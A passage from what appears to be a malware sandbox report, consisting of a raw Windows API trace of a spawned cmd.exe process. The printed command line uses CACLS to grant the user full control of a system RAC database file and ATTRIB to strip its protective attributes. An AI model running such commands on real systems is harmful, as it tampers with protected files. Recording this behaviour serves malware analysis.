ppResult=0x199fbac | out: ppResult=0x199fbac*=0x0) returned 11001 [0117.149] getnameinfo (in: pSockaddr=0x199fc14, SockaddrLength=0x0, pNodeBuffer=0x135184c, NodeBufferSize=0x401, pServiceBuffer=0x141515c, ServiceBufferSize=0x20, Flags=10 | out: pNodeBuffer="s", pServiceBuffer="") returned 10047 [0117.149] htons (hostshort=0x0) returned 0x0 [0117.149] 
MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 0 [0117.149] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x0, lpMultiByteStr=0x0, cbMultiByte=0, lpWideCharStr=0x407d24, cchWideChar=0 | out: lpWideCharStr="") returned 0 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] SetEvent (hEvent=0x84) returned 1 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] GetCurrentThreadId () returned 0xe84 [0117.149] CloseHandle (hObject=0x118) returned 1 [0117.149] RtlExitUserThread (Status=0x0) Process: id = "51" image_name = "cmd.exe" filename = "c:\\windows\\system32\\cmd.exe" page_root = "0x7ea168e0" os_pid = "0xdfc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "9" os_parent_pid = "0xaec" cmd_line = "\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"" cur_dir = "C:\\Users\\EEBsYm5\\Desktop\\" os_username = "CRH2YWU7\\EEBsYm5" os_groups = "CRH2YWU7\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT 
AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ea01" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 7940 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 7941 start_va = 0x30000 end_va = 0x33fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 7942 start_va = 0x40000 end_va = 0x40fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 7943 start_va = 0x150000 end_va = 0x24ffff entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 7944 start_va = 0x4a9c0000 end_va = 0x4aa0bfff entry_point = 0x4a9c0000 region_type = mapped_file name = "cmd.exe" filename = "\\Windows\\System32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe") Region: id = 7945 start_va = 0x77230000 end_va = 0x7736bfff entry_point = 0x77230000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 7946 start_va = 0x77470000 end_va = 0x77470fff entry_point = 0x77470000 region_type = mapped_file name = "apisetschema.dll" filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll") Region: id = 7947 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 7948 start_va = 0x7ffd4000 end_va = 0x7ffd4fff entry_point = 0x0 region_type = private name = "private_0x000000007ffd4000" filename = "" Region: id = 7949 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 8577 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed 
name = "pagefile_0x0000000000010000" filename = "" Region: id = 8578 start_va = 0x20000 end_va = 0x2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000020000" filename = "" Region: id = 8579 start_va = 0x50000 end_va = 0xb6fff entry_point = 0x50000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 8580 start_va = 0x360000 end_va = 0x45ffff entry_point = 0x0 region_type = private name = "private_0x0000000000360000" filename = "" Region: id = 8581 start_va = 0x5c0000 end_va = 0x5cffff entry_point = 0x0 region_type = private name = "private_0x00000000005c0000" filename = "" Region: id = 8582 start_va = 0x6ee80000 end_va = 0x6ee86fff entry_point = 0x6ee80000 region_type = mapped_file name = "winbrand.dll" filename = "\\Windows\\System32\\winbrand.dll" (normalized: "c:\\windows\\system32\\winbrand.dll") Region: id = 8583 start_va = 0x75540000 end_va = 0x75589fff entry_point = 0x75540000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 8584 start_va = 0x76480000 end_va = 0x76489fff entry_point = 0x76480000 region_type = mapped_file name = "lpk.dll" filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll") Region: id = 8585 start_va = 0x76910000 end_va = 0x769e3fff entry_point = 0x76910000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 8586 start_va = 0x76a90000 end_va = 0x76b3bfff entry_point = 0x76a90000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 8587 start_va = 0x76b40000 end_va = 0x76c08fff entry_point = 0x76b40000 region_type = mapped_file name = "user32.dll" filename = 
"\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 8588 start_va = 0x76d70000 end_va = 0x76e0cfff entry_point = 0x76d70000 region_type = mapped_file name = "usp10.dll" filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll") Region: id = 8589 start_va = 0x773e0000 end_va = 0x7742dfff entry_point = 0x773e0000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 8590 start_va = 0x7f6f0000 end_va = 0x7f7effff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007f6f0000" filename = "" Region: id = 8591 start_va = 0x250000 end_va = 0x317fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000250000" filename = "" Region: id = 8592 start_va = 0x76490000 end_va = 0x764aefff entry_point = 0x76490000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 8593 start_va = 0x76ca0000 end_va = 0x76d6bfff entry_point = 0x76ca0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 8594 start_va = 0xc0000 end_va = 0xc6fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000c0000" filename = "" Region: id = 8595 start_va = 0xd0000 end_va = 0xd1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 8596 start_va = 0xe0000 end_va = 0xe0fff entry_point = 0x0 region_type = private name = "private_0x00000000000e0000" filename = "" Region: id = 8597 start_va = 0xf0000 end_va = 0xf0fff entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 8598 start_va = 0x460000 end_va = 0x560fff entry_point = 0x0 region_type = pagefile_backed name = 
"pagefile_0x0000000000460000" filename = "" Region: id = 8599 start_va = 0x5d0000 end_va = 0x11cffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000005d0000" filename = "" Region: id = 8600 start_va = 0x11d0000 end_va = 0x1332fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000011d0000" filename = "" Region: id = 8614 start_va = 0x1340000 end_va = 0x160efff entry_point = 0x1340000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Thread: id = 81 os_tid = 0xe00 [0117.050] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x24fe5c | out: lpSystemTimeAsFileTime=0x24fe5c*(dwLowDateTime=0x83133600, dwHighDateTime=0x1d440a9)) [0117.050] GetCurrentProcessId () returned 0xdfc [0117.050] GetCurrentThreadId () returned 0xe00 [0117.050] GetTickCount () returned 0x27c40 [0117.050] QueryPerformanceCounter (in: lpPerformanceCount=0x24fe54 | out: lpPerformanceCount=0x24fe54*=17383940624) returned 1 [0117.051] GetModuleHandleA (lpModuleName=0x0) returned 0x4a9c0000 [0117.051] __set_app_type (_Type=0x1) [0117.051] __p__fmode () returned 0x76b331f4 [0117.051] __p__commode () returned 0x76b331fc [0117.051] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x4a9e21a6) returned 0x0 [0117.051] __getmainargs (in: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c, _DoWildCard=0, _StartInfo=0x4a9e4140 | out: _Argc=0x4a9e4238, _Argv=0x4a9e4240, _Env=0x4a9e423c) returned 0 [0117.051] GetCurrentThreadId () returned 0xe00 [0117.051] OpenThread (dwDesiredAccess=0x1fffff, bInheritHandle=0, dwThreadId=0xe00) returned 0x38 [0117.051] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.051] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadUILanguage") returned 0x769624c2 [0117.051] SetThreadUILanguage (LangId=0x0) returned 0x409 [0117.051] HeapSetInformation (HeapHandle=0x0, 
HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0117.051] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Policies\\Microsoft\\Windows\\System", ulOptions=0x0, samDesired=0x20019, phkResult=0x24fdec | out: phkResult=0x24fdec*=0x0) returned 0x2 [0117.052] VirtualQuery (in: lpAddress=0x24fe23, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x24f000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.052] VirtualQuery (in: lpAddress=0x150000, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x150000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x1000, State=0x2000, Protect=0x0, Type=0x20000)) returned 0x1c [0117.052] VirtualQuery (in: lpAddress=0x151000, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x151000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0x2000, State=0x1000, Protect=0x104, Type=0x20000)) returned 0x1c [0117.052] VirtualQuery (in: lpAddress=0x153000, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x153000, AllocationBase=0x150000, AllocationProtect=0x4, RegionSize=0xfd000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0117.052] VirtualQuery (in: lpAddress=0x250000, lpBuffer=0x24fdbc, dwLength=0x1c | out: lpBuffer=0x24fdbc*(BaseAddress=0x250000, AllocationBase=0x250000, AllocationProtect=0x2, RegionSize=0x2000, State=0x1000, Protect=0x2, Type=0x40000)) returned 0x1c [0117.052] GetConsoleOutputCP () returned 0x1b5 [0117.052] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.052] SetConsoleCtrlHandler (HandlerRoutine=0x4a9de72a, Add=1) returned 1 [0117.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x0) returned 1 [0117.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.052] GetConsoleMode (in: 
hConsoleHandle=0x7, lpMode=0x4a9e41ac | out: lpMode=0x4a9e41ac) returned 1 [0117.052] _get_osfhandle (_FileHandle=1) returned 0x7 [0117.052] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0117.053] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.053] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x4a9e41b0 | out: lpMode=0x4a9e41b0) returned 1 [0117.053] _get_osfhandle (_FileHandle=0) returned 0x3 [0117.053] SetConsoleMode (hConsoleHandle=0x3, dwMode=0x1a7) returned 1 [0117.053] GetEnvironmentStringsW () returned 0x370270* [0117.053] FreeEnvironmentStringsW (penv=0x370270) returned 1 [0117.053] GetEnvironmentStringsW () returned 0x370270* [0117.053] FreeEnvironmentStringsW (penv=0x370270) returned 1 [0117.053] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed5c | out: phkResult=0x24ed5c*=0x40) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x0, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x1, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x1, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x0, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed64, 
lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x40, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x40, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x40, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegCloseKey (hKey=0x40) returned 0x0 [0117.054] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x24ed5c | out: phkResult=0x24ed5c*=0x40) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x40, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x1, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x1, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x0, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, 
lpData=0x24ed68*=0x9, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x4, lpData=0x24ed68*=0x9, lpcbData=0x24ed60*=0x4) returned 0x0 [0117.054] RegQueryValueExW (in: hKey=0x40, lpValueName="AutoRun", lpReserved=0x0, lpType=0x24ed64, lpData=0x24ed68, lpcbData=0x24ed60*=0x1000 | out: lpType=0x24ed64*=0x0, lpData=0x24ed68*=0x9, lpcbData=0x24ed60*=0x1000) returned 0x2 [0117.054] RegCloseKey (hKey=0x40) returned 0x0 [0117.054] time (in: timer=0x0 | out: timer=0x0) returned 0x5b88635d [0117.054] srand (_Seed=0x5b88635d) [0117.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"" [0117.054] GetCommandLineW () returned="\"C:\\Windows\\system32\\cmd.exe\" /C CACLS \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\" /E /G %USERNAME%:F /C & ATTRIB -R -A -H \"C:\\Users\\All Users\\Microsoft\\RAC\\PublishedData\\RacWmiDatabase.sdf\"" [0117.055] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.055] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x3719d0, nSize=0x104 | out: lpFilename="C:\\Windows\\system32\\cmd.exe" (normalized: "c:\\windows\\system32\\cmd.exe")) returned 0x1b [0117.055] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0117.055] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0117.055] 
GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.055] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0117.055] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0117.055] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0117.055] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0117.055] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0117.055] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0117.055] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0117.055] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0117.055] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0117.055] GetEnvironmentStringsW () returned 0x3723c0* [0117.056] FreeEnvironmentStringsW (penv=0x3723c0) returned 1 [0117.056] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.056] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0117.056] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0117.056] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0117.056] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0117.056] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0117.056] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0117.056] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0117.056] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0117.056] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0117.056] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x24fb28 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.056] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x24fb28, 
lpFilePart=0x24fb24 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x24fb24*="Desktop") returned 0x18 [0117.056] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.056] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x24f8a4 | out: lpFindFileData=0x24f8a4) returned 0x370a50 [0117.056] FindClose (in: hFindFile=0x370a50 | out: hFindFile=0x370a50) returned 1 [0117.057] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x24f8a4 | out: lpFindFileData=0x24f8a4) returned 0x370a50 [0117.057] FindClose (in: hFindFile=0x370a50 | out: hFindFile=0x370a50) returned 1 [0117.057] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x24f8a4 | out: lpFindFileData=0x24f8a4) returned 0x370a50 [0117.057] FindClose (in: hFindFile=0x370a50 | out: hFindFile=0x370a50) returned 1 [0117.057] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0117.057] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0117.057] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0117.057] GetEnvironmentStringsW () returned 0x370270* [0117.057] FreeEnvironmentStringsW (penv=0x370270) returned 1 [0117.057] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0117.058] GetConsoleOutputCP () returned 0x1b5 [0117.058] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 [0117.058] GetUserDefaultLCID () returned 0x409 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x24fc68, cchData=128 | out: lpLCData="0") returned 2 [0117.058] GetLocaleInfoW (in: 
Locale=0x409, LCType=0x21, lpLCData=0x24fc68, cchData=128 | out: lpLCData="0") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x24fc68, cchData=128 | out: lpLCData="1") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0117.058] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0117.059] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0117.060] GetConsoleTitleW (in: lpConsoleTitle=0x360970, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.060] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0117.060] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0117.060] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0117.060] GetProcAddress (hModule=0x76910000, 
lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0117.061] GetEnvironmentVariableW (in: lpName="USERNAME", lpBuffer=0x4a9f0640, nSize=0x2000 | out: lpBuffer="EEBsYm5") returned 0x7 [0117.061] _wcsicmp (_String1="CACLS", _String2=")") returned 58 [0117.061] _wcsicmp (_String1="FOR", _String2="CACLS") returned 3 [0117.061] _wcsicmp (_String1="FOR/?", _String2="CACLS") returned 3 [0117.061] _wcsicmp (_String1="IF", _String2="CACLS") returned 6 [0117.061] _wcsicmp (_String1="IF/?", _String2="CACLS") returned 6 [0117.061] _wcsicmp (_String1="REM", _String2="CACLS") returned 15 [0117.061] _wcsicmp (_String1="REM/?", _String2="CACLS") returned 15 [0117.064] _wcsicmp (_String1="ATTRIB", _String2=")") returned 56 [0117.064] _wcsicmp (_String1="FOR", _String2="ATTRIB") returned 5 [0117.064] _wcsicmp (_String1="FOR/?", _String2="ATTRIB") returned 5 [0117.064] _wcsicmp (_String1="IF", _String2="ATTRIB") returned 8 [0117.064] _wcsicmp (_String1="IF/?", _String2="ATTRIB") returned 8 [0117.064] _wcsicmp (_String1="REM", _String2="ATTRIB") returned 17 [0117.064] _wcsicmp (_String1="REM/?", _String2="ATTRIB") returned 17 [0117.066] GetConsoleTitleW (in: lpConsoleTitle=0x24f8fc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0117.066] _wcsicmp (_String1="CACLS", _String2="DIR") returned -1 [0117.066] _wcsicmp (_String1="CACLS", _String2="ERASE") returned -2 [0117.066] _wcsicmp (_String1="CACLS", _String2="DEL") returned -1 [0117.066] _wcsicmp (_String1="CACLS", _String2="TYPE") returned -17 [0117.066] _wcsicmp (_String1="CACLS", _String2="COPY") returned -14 [0117.066] _wcsicmp (_String1="CACLS", _String2="CD") returned -3 [0117.066] _wcsicmp (_String1="CACLS", _String2="CHDIR") returned -7 [0117.066] _wcsicmp (_String1="CACLS", _String2="RENAME") returned -15 [0117.066] _wcsicmp (_String1="CACLS", _String2="REN") returned -15 [0117.066] _wcsicmp (_String1="CACLS", _String2="ECHO") returned -2 [0117.066] _wcsicmp (_String1="CACLS", 
